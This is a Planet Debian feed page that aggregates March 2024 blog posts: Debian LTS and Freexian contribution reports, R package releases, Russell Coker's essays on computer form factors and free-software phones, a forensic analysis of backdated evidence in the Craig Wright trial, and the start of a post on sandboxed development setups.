Planet Debian

Subscribe to Planet Debian feed
Planet Debian - https://planet.debian.org/
Updated: 14 hours 10 min ago

Patryk Cisek: OpenPGP Paper Backup

Fri, 2024-03-15 17:42
openpgp-paper-backup I’ve been using OpenPGP through GnuPG since early 2000’. It’s an essential part of Debian Developer’s workflow. We use it regularly to authenticate package uploads and votes. Proper backups of that key are really important. Up until recently, the only reliable option for me was backing up a tarball of my ~/.gnupg offline on a set few flash drives. This approach is better than nothing, but it’s not nearly as reliable as I’d like it to be.
Categories: FLOSS Project Planets

Gregor Herrmann: teamwork in practice

Thu, 2024-03-14 18:10

teamwork, or: why I love the Debian Perl Group:

elbrus has introduced a (very untypical) package into the Debian Perl Group in 2022.

after changes of the default compiler options (-Werror=implicit-function-declaration) in debian, it didn't build any more & received an RC bug.

because I sometimes like challenges, I had a look at it & cobbled together a patch. as I hardly speak any C, I sent my notes to the bug report & (implictly) asked for help. – & went out to meet a friend.

when I came home, I found an email from ntyni, sent less than 2 hours after my mail, where he friendly pointed out the issues with my patch – & sent a corrected version.

all I needed to do was to adjust the patch & upload the package. one more bug fixed, one less task for us, & elbrus can concentrate on more important tasks :)
thanks again, niko!

Categories: FLOSS Project Planets

Matthew Garrett: Digital forgeries are hard

Thu, 2024-03-14 05:11
Closing arguments in the trial between various people and Craig Wright over whether he's Satoshi Nakamoto are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for both sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.

One of the pieces of evidence entered is screenshots of data from Mind Your Own Business, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.

One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the data base in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.

This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.

And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This was created by the client, so was consistent with the email having been sent in 2024, not being sent in 2019 and somehow getting stuck somewhere before delivery. The date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.

But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.

This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.

Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.

(References: this Dropbox, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")

comments
Categories: FLOSS Project Planets

Dirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!

Wed, 2024-03-13 20:03

Happy to share that ciw is now on CRAN! I had tooted a little bit about it, e.g., here. What it provides is a single (efficient) function incoming() which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release.

For example, when I do this right now as I type this, I see

edd@rob:~$ ciw.r Folder Name Time Size Age <char> <char> <POSc> <char> <difftime> 1: waiting maximin_1.0-5.tar.gz 2024-03-13 22:22:00 20K 2.48 hours 2: inspect GofCens_0.97.tar.gz 2024-03-13 21:12:00 29K 3.65 hours 3: inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00 79K 4.70 hours 4: waiting rnames_1.0.1.tar.gz 2024-03-12 15:04:00 2.7K 33.78 hours 5: waiting PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00 406K 84.32 hours 6: pending MPCR_1.1.tar.gz 2024-02-22 11:07:00 903K 493.73 hours edd@rob:~$

which is rather compact as CRAN kept busy! This call runs in about (or just over) one second, which includes launching r. Good enough for me. From a well-connected EC2 instance it is about 800ms on the command-line. When I do I from here inside an R session it is maybe 700ms. And doing it over in Europe is faster still. (I am using ping=FALSE for these to omit the default sanity check of ‘can I haz networking?’ to speed things up. The check adds another 200ms or so.)

The function (and the wrapper) offer a ton of options too this is ridiculously easy to do thanks to the docopt package:

edd@rob:~$ ciw.r -x Usage: ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...] -m --mega use 'mega' mode of all folders (see --usage) -i --inspect visit 'inspect' folder -t --pretest visit 'pretest' folder -p --pending visit 'pending' folder -w --waiting visit 'waiting' folder -r --recheck visit 'waiting' folder -a --archive visit 'archive' folder -n --newbies visit 'newbies' folder -u --publish visit 'publish' folder -s --skipsort skip sorting of aggregate results by age -l --lines rows print top 'rows' of the result object [default: 50] -z --ping run the connectivity check first -h --help show this help text -x --usage show help and short example usage where ARG... can be one or more file name, or directories or package names. Examples: ciw.r -ip # run in 'inspect' and 'pending' mode ciw.r -a # run with mode 'auto' resolved in incoming() ciw.r # run with defaults, same as '-itpwr' When no argument is given, 'auto' is selected which corresponds to 'inspect', 'waiting', 'pending', 'pretest', and 'recheck'. Selecting '-m' or '--mega' are select as default. Folder selecting arguments are cumulative; but 'mega' is a single selections of all folders (i.e. 'inspect', 'waiting', 'pending', 'pretest', 'recheck', 'archive', 'newbies', 'publish'). ciw.r is part of littler which brings 'r' to the command-line. See https://dirk.eddelbuettel.com/code/littler.html for more information. edd@rob:~$

The README at the git repo and the CRAN page offer a ‘screenshot movie’ showing some of the options in action.

I have been using the little tools quite a bit over the last two or three weeks since I first put it together and find it quite handy. With that again a big Thank You! of appcreciation for all that CRAN does—which this week included letting this past the newbies desk in under 24 hours.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Categories: FLOSS Project Planets

Freexian Collaborators: Monthly report about Debian Long Term Support, February 2024 (by Roberto C. Sánchez)

Wed, 2024-03-13 20:00

Like each month, have a look at the work funded by Freexian’s Debian LTS offering.

Debian LTS contributors

In February, 18 contributors have been paid to work on Debian LTS, their reports are available:

  • Abhijith PA did 10.0h (out of 14.0h assigned), thus carrying over 4.0h to the next month.
  • Adrian Bunk did 13.5h (out of 24.25h assigned and 41.75h from previous period), thus carrying over 52.5h to the next month.
  • Bastien Roucariès did 20.0h (out of 20.0h assigned).
  • Ben Hutchings did 2.0h (out of 14.5h assigned and 9.5h from previous period), thus carrying over 22.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 10.0h (out of 10.0h assigned).
  • Emilio Pozuelo Monfort did 3.0h (out of 28.25h assigned and 31.75h from previous period), thus carrying over 57.0h to the next month.
  • Guilhem Moulin did 7.25h (out of 4.75h assigned and 15.25h from previous period), thus carrying over 12.75h to the next month.
  • Holger Levsen did 0.5h (out of 3.5h assigned and 8.5h from previous period), thus carrying over 11.5h to the next month.
  • Lee Garrett did 0.0h (out of 18.25h assigned and 41.75h from previous period), thus carrying over 60.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. Sánchez did 3.5h (out of 8.75h assigned and 3.25h from previous period), thus carrying over 8.5h to the next month.
  • Santiago Ruano Rincón did 13.5h (out of 13.5h assigned and 2.5h from previous period), thus carrying over 2.5h to the next month.
  • Sean Whitton did 4.5h (out of 0.5h assigned and 5.5h from previous period), thus carrying over 1.5h to the next month.
  • Sylvain Beucler did 24.5h (out of 27.75h assigned and 32.25h from previous period), thus carrying over 35.5h to the next month.
  • Thorsten Alteholz did 14.0h (out of 14.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).
  • Utkarsh Gupta did 11.25h (out of 26.75h assigned and 33.25h from previous period), thus carrying over 48.75 to the next month.
Evolution of the situation

In February, we have released 17 DLAs.

The number of DLAs published during February was a bit lower than usual, as there was much work going on in the area of triaging CVEs (a number of which turned out to not affect Debia buster, and others which ended up being duplicates, or otherwise determined to be invalid). Of the packages which did receive updates, notable were sudo (to fix a privilege management issue), and iwd and wpa (both of which suffered from authentication bypass vulnerabilities).

While this has already been already announced in the Freexian blog, we would like to mention here the start of the Long Term Support project for Samba 4.17. You can find all the important details in that post, but we would like to highlight that it is thanks to our LTS sponsors that we are able to fund the work from our partner, Catalyst, towards improving the security support of Samba in Debian 12 (Bookworm).

Thanks to our sponsors

Sponsors that joined recently are in bold.

Categories: FLOSS Project Planets

Russell Coker: The Shape of Computers

Wed, 2024-03-13 08:16
Introduction

There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.

This means that further development in the size and shape of computers will largely be determined by human factors.

I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.

Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.

Desktop/Laptop PCs

When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the Raspberry Pi 400 [1] which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a “add a screen to make a laptop” as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.

The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.

The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2].

The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US.

I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.

We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.

The Interesting New Things Watch Like

The wrist-watch [4] has been a standard format for easy access to data when on the go since it’s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as “pocket watches” for about 10 years.

The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?

Phone Like

Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I’ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence.

Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.

Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.

The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.

Laptop Like

One interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.

The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet.

Another interesting thing that’s on offer is a laptop with 7″ touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.

Useful Hardware for Developing These Things

I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.

The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too.

The PinePhonePro is an OK phone made to open standards but it’s hardware isn’t as good as Android phones released in the same year [17]. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.

Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.

What We Must Do

Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn’t get it going.

To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.

Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven’t investigated this properly yet, it definitely doesn’t work in an expected manner in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.

ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.

Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it’s own special apps it’s not usable in a “I want to run applications that use any files from any other applicationsin any way I want” sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.

I will write more posts about these thing.

Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.

Related posts:

  1. My Ideal Mobile Phone Based on my experience testing the IBM Seer software on...
  2. Do Desktop Computers Make Sense? Laptop vs Desktop Price Currently the smaller and cheaper USB-C...
  3. Mobile Phones Are Computers One thing I noticed when I got my new LG...
Categories: FLOSS Project Planets

Freexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)

Tue, 2024-03-12 20:00

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

/usr-move, by Helmut Grohne

Much of the work was spent on handling interaction with time time64 transition and sending patches for mitigating fallout. The set of packages relevant to debootstrap is mostly converted and the patches for glibc and base-files have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with dh-sequence-movetousr and packages using dpkg-divert in ways that dumat would not recognize.

Upcoming improvements to Salsa CI, by Santiago Ruano Rincón

Last month, Santiago Ruano Rincón started the work on integrating sbuild into the Salsa CI pipeline. Initially, Santiago used sbuild with the unshare chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (eg: krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some C/C++ large projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache to work.

Finally, Santiago changed the chroot mode, and now has a couple of POC (cf: 1 and 2) that rely on the schroot and sudo, respectively. And the good news is that ccache is successfully used by sbuild with schroot!

The image here comes from an example of building grep. At the end of the build, ccache -s shows the statistics of the cache that it used, and so a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline.

Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zmölnig to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in the very own Salsa CI’s CI.

Packaging simplemonitor, by Carles Pina i Estany

Carles started using simplemonitor in 2017, opened a WNPP bug in 2022 and started packaging simplemonitor dependencies in October 2023. After packaging five direct and indirect dependencies, Carles finally uploaded simplemonitor to unstable in February.

During the packaging of simplemonitor, Carles reported a few issues to upstream. Some of these were to make the simplemonitor package build and run tests reproducibly. A reproducibility issue was reprotest overriding the timezone, which broke simplemonitor’s tests. There have been discussions on resolving this upstream in simplemonitor and in reprotest, too.

Carles also started upgrading or improving some of simplemonitor’s dependencies.

Miscellaneous contributions
  • Stefano Rivera spent some time doing admin on debian.social infrastructure. Including dealing with a spike of abuse on the Jitsi server.
  • Stefano started to prepare a new release of dh-python, including cleaning out a lot of old Python 2.x related code. Thanks to Niels Thykier (outside Freexian) for spear-heading this work.
  • DebConf 24 planning is beginning. Stefano discussed venues and finances with the local team and remotely supported a site-visit by Nattie (outside Freexian).
  • Also in the DebConf 24 context, Santiago took part in discussions and preparations related to the Content Team.
  • A JIT bug was reported against pypy3 in Debian Bookworm. Stefano bisected the upstream history to find the patch (it was already resolved upstream) and released an update to pypy3 in bookworm.
  • Enrico participated in /usr-merge discussions with Helmut.
  • Colin Watson backported a python-channels-redis fix to bookworm, rediscovered while working on debusine.
  • Colin dug into a cluster of celery build failures and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable. celery should be back in testing once the 64-bit time_t migration is out of the way.
  • Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately upstream changed the naming of their release tags, so updating the watch file was a bit demanding. Anyway this version 2.0 is a huge step towards introduction of the new Common Print Dialog Backends.
  • Helmut send patches for 48 cross build failures.
  • Helmut changed debvm to use mkfs.ext4 instead of genext2fs.
  • Helmut sent a debci MR for improving collector robustness.
  • In preparation for DebConf 25, Santiago worked on the Brest Bid.
Categories: FLOSS Project Planets

Russell Coker: Android vs FOSS Phones

Tue, 2024-03-12 06:35

To achieve my aims regarding Convergence of mobile phone and PC [1] I need something a big bigger than the 4G of RAM that’s in the PinePhone Pro [2]. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.

PostmarketOS

One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the PostmarketOS Wiki page of supported devices [3] was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn’t appear to be available on ebay.

LineageOS

The libhybris libraries are a compatibility layer between Android and glibc programs [4]. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.

Phone RAM External Display Price Edge 20 Pro [5] 6-12G HDMI $500 not many on sale Edge S aka moto G100 [6] 6-8G HDMI $500 to $600+ Fairphone 4 6-8G USBC-DP $1000+ Nubia Red Magic 5G 8-16G USBC-DP $600+

The LineageOS device search page [9] allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the kernel.org supported release list [10]. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.

Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.

IP Laws and Practices

Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]. This is a major factor in the lack of support for FOSS on phones and other devices.

Droidian and Buying a Note 9

The FOSDEM 2023 has a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]. It’s interesting how they use containers for the necessary Android apps. Here is the list of devices supported by Droidian [14].

Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from Volla – a company dedicated to making open Android based devices [15]. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.

Phone RAM Price Issues Note 9 128G/512G 6G/8G <$300 Not supporting external display Galaxy S9+ 6G <$300 Not supporting external display Xperia 5 6G >$300 Hotspot partly working OnePlus 3T 6G $200 – $400+ photos not working

I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.

Mobian

I should have checked the Mobian list first as it’s the main Debian variant for phones.

From the Mobian Devices list [16] the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The Shift6mq is made by a German company with similar aims to the Fairphone [17], it looks nice but costs E577 which is more than I want to spend and isn’t on the officially supported list.

Smart Watches

The same issues apply to smart watches. AstereoidOS is a free smart phone OS designed for closed hardware [18]. I don’t have time to get involved in this sort of thing though, I can’t hack on every device I use.

Related posts:

  1. The Australian Open and Android Phones (Seer) On Monday the 25th of January 2010 I visited the...
  2. Dual SIM Phones vs Amaysim vs Contract for Mobile Phones Currently Dick Smith is offering two dual-SIM mobile phones for...
  3. Pixel 6A I have just bought a Pixel 6A [1] for my...
Categories: FLOSS Project Planets

Dirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code

Mon, 2024-03-11 19:23

Release 0.6.35 of the digest package arrived at CRAN today and has also been uploaded to Debian already.

digest creates hash digests of arbitrary R objects. It can use a number different hashing algorithms (md5, sha-1, sha-256, sha-512, crc32, xxhash32, xxhash64, murmur32, spookyhash, blake3,crc32c – and now also xxh3_64 and xxh3_128), and enables easy comparison of (potentially large and nested) R language objects as it relies on the native serialization in R. It is a mature and widely-used package (with 65.8 million downloads just on the partial cloud mirrors of CRAN which keep logs) as many tasks may involve caching of objects for which it provides convenient general-purpose hash key generation to quickly identify the various objects.

This release updates the included xxHash version to the current verion 0.8.2 updating the existing xxhash32 and xxhash64 hash functions — and also adding the newer xxh3_64 and xxh3_128 ones. We have a project at work using xxh3_128 from Python which made me realize having it from R would be nice too, and given the existing infrastructure in the package actually doing so was fairly quick and straightforward.

My CRANberries provides a summary of changes to the previous version. For questions or comments use the issue tracker off the GitHub repo. For documentation (including the changelog) see the documentation site.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Categories: FLOSS Project Planets

Joachim Breitner: Convenient sandboxed development environment

Mon, 2024-03-11 16:39

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.

In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.

Convenient or it won’t happen

Nevertheless I thought I should do something about this. The safest option would probably to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenient, and one that does not get too much in the way of my current habits.

For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. git push, git pull from private repositories, gh pr create) from “the outside”, and the actual build environment can do without access to these secrets.

